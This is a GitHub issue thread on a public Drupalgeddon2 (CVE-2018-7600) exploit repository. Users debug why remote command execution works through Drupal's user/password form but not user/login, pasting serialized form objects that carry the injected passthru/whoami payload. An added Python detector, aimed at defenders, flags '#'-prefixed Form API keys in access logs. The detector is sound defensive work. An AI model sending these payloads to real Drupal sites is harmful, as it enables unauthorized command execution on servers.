dreadlocked / Drupalgeddon2

Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)

using the user/login instead user/password? #58

Open intrd opened 5 years ago

intrd commented 5 years ago

Thank you guys for this exploit,

I was trying to make this work with the user/password form instead of user/login (disabled), and got this response:

[{"command":"settings","settings":{"basePath":"\/drupal-7.43\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cdiv class=\u0022messages error\u0022\u003E\n\u003Ch2 class=\u0022element-invisible\u0022\u003EError message\u003C\/h2\u003E\n \u003Cul\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C\/em\u003E: Undefined index: #value in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C\/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E262\u003C\/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C\/em\u003E).\u003C\/li\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C\/em\u003E: Undefined index: #suffix in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C\/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E280\u003C\/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C\/em\u003E).\u003C\/li\u003E\n \u003C\/ul\u003E\n\u003C\/div\u003E\n\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":{"basePath":"\/drupal-7.43\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}}}]

I also changed the form_id; I think the problem was in _triggering_element_name..

intrd commented 5 years ago

..additional information:

serialized object on user/password (RCE works)

a:16:{s:4:"name";a:6:{s:5:"#type";s:9:"textfield";s:6:"#title";s:26:"Username or e-mail address";s:5:"#size";i:60;s:10:"#maxlength";i:254;s:9:"#required";b:1;s:14:"#default_value";a:3:{s:12:"#post_render";a:1:{i:0;s:5:"passthru";}s:5:"#type";s:6:"markup";s:7:"#markup";s:6:"whoami";}}s:7:"actions";a:2:{s:5:"#type";s:7:"actions";s:6:"submit";a:2:{s:5:"#type";s:6:"submit";s:6:"#value";s:19:"E-mail new password";}}s:8:"#form_id";s:9:"user_pass";s:9:"#build_id";s:48:"form-RVaa72twEpNMiJbkNILI5EQoPyjBswMxbHExHX-J4bo";s:5:"#type";s:4:"form";s:13:"form_build_id";a:5:{s:5:"#type";s:6:"hidden";s:6:"#value";s:48:"form-RVaa72twEpNMiJbkNILI5EQoPyjBswMxbHExHX-J4bo";s:3:"#id";s:48:"form-RVaa72twEpNMiJbkNILI5EQoPyjBswMxbHExHX-J4bo";s:5:"#name";s:13:"form_build_id";s:8:"#parents";a:1:{i:0;s:13:"form_build_id";}}s:7:"form_id";a:4:{s:5:"#type";s:6:"hidden";s:6:"#value";s:9:"user_pass";s:3:"#id";s:14:"edit-user-pass";s:8:"#parents";a:1:{i:0;s:7:"form_id";}}s:3:"#id";s:9:"user-pass";s:7:"#method";s:4:"post";s:7:"#action";s:120:"/drupal-7.43/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami";s:15:"#theme_wrappers";a:1:{i:0;s:4:"form";}s:5:"#tree";b:0;s:8:"#parents";a:0:{}s:9:"#validate";a:1:{i:0;s:18:"user_pass_validate";}s:7:"#submit";a:1:{i:0;s:16:"user_pass_submit";}s:6:"#theme";a:1:{i:0;s:9:"user_pass";}}

serialized object on user/login (RCE does not work)

a:17:{s:4:"name";a:6:{s:5:"#type";s:9:"textfield";s:6:"#title";s:8:"Username";s:5:"#size";i:60;s:10:"#maxlength";i:60;s:9:"#required";b:1;s:12:"#description";s:26:"Enter your bpsbr username.";}s:4:"pass";a:4:{s:5:"#type";s:8:"password";s:6:"#title";s:8:"Password";s:12:"#description";s:50:"Enter the password that accompanies your username.";s:9:"#required";b:1;}s:9:"#validate";a:3:{i:0;s:24:"user_login_name_validate";i:1;s:32:"user_login_authenticate_validate";i:2;s:25:"user_login_final_validate";}s:7:"actions";a:2:{s:5:"#type";s:7:"actions";s:6:"submit";a:2:{s:5:"#type";s:6:"submit";s:6:"#value";s:6:"Log in";}}s:8:"#form_id";s:10:"user_login";s:9:"#build_id";s:48:"form-kpb7PWBlRuJoZSQpcwIJs5fVSyHei_MJqIEs5VWJaSg";s:5:"#type";s:4:"form";s:13:"form_build_id";a:5:{s:5:"#type";s:6:"hidden";s:6:"#value";s:48:"form-kpb7PWBlRuJoZSQpcwIJs5fVSyHei_MJqIEs5VWJaSg";s:3:"#id";s:48:"form-kpb7PWBlRuJoZSQpcwIJs5fVSyHei_MJqIEs5VWJaSg";s:5:"#name";s:13:"form_build_id";s:8:"#parents";a:1:{i:0;s:13:"form_build_id";}}s:7:"form_id";a:4:{s:5:"#type";s:6:"hidden";s:6:"#value";s:10:"user_login";s:3:"#id";s:15:"edit-user-login";s:8:"#parents";a:1:{i:0;s:7:"form_id";}}s:3:"#id";s:10:"user-login";s:7:"#method";s:4:"post";s:7:"#action";s:120:"/drupal-7.43/?q=user%2Flogin&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami";s:15:"#theme_wrappers";a:1:{i:0;s:4:"form";}s:5:"#tree";b:0;s:8:"#parents";a:0:{}s:7:"#submit";a:1:{i:0;s:17:"user_login_submit";}s:6:"#theme";a:1:{i:0;s:10:"user_login";}}

..as we can see, the passthru(whoami) is not injected.
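For defenders reading this thread: the telltale of both serialized forms above is the `#action` query string, which carries `#`-prefixed Form API property keys (`name[#post_render][]`, `name[#type]`, `name[#markup]`) in request input, something a legitimate client never sends. The following is an added detection example, not code from this issue or from the exploit repository; it runs over constructed access-log lines that mirror those `#action` strings and flags any request whose decoded parameter keys contain a `#`-prefixed segment.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not taken from the issue). The first two
# request targets mirror the #action strings quoted in the serialized forms.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2018:12:00:01 +0000] "POST /drupal-7.43/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami HTTP/1.1" 200 1532
203.0.113.5 - - [10/May/2018:12:00:02 +0000] "POST /drupal-7.43/?q=user%2Flogin&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami HTTP/1.1" 200 2101
198.51.100.7 - - [10/May/2018:12:00:03 +0000] "GET /drupal-7.43/?q=user%2Fpassword&name=alice HTTP/1.1" 200 4410
198.51.100.8 - - [10/May/2018:12:00:04 +0000] "GET /drupal-7.43/?q=node%2F1#comment-3 HTTP/1.1" 200 5002
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Form API property keys all start with '#'. Request input should never carry
# them, so a '#'-prefixed segment anywhere in a bracketed key path is a hit.
HASH_KEY_RE = re.compile(r'(^|\[)#[A-Za-z_]+\]?')


def injected_keys(target: str) -> list[str]:
    """Return the decoded parameter keys of a request target that carry a
    '#'-prefixed segment. The URL fragment (a literal '#') is split off by
    urlsplit, so only percent-encoded '#' inside a key counts."""
    query = urlsplit(target).query
    return [key for key, _ in parse_qsl(query, keep_blank_values=True)
            if HASH_KEY_RE.search(key)]


def scan_log(text: str) -> list[dict]:
    """Scan combined-format access-log lines and report requests whose query
    string injects Form API keys. Note that the same keys can arrive in the
    POST body, which access logs do not record; apply the same key check to
    request bodies in a WAF or application middleware."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        keys = injected_keys(m.group("target"))
        if keys:
            findings.append({
                "client": line.split()[0],
                "path": parts.path,
                # Drupal 7 clean-URL-less routing: the 'q' parameter is the route.
                "form": dict(parse_qsl(parts.query)).get("q"),
                "keys": keys,
            })
    return findings
```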

RogueSMG commented 4 years ago

Is this figured out yet? I'm having the same issue. Getting json in response but the command doesn't trigger.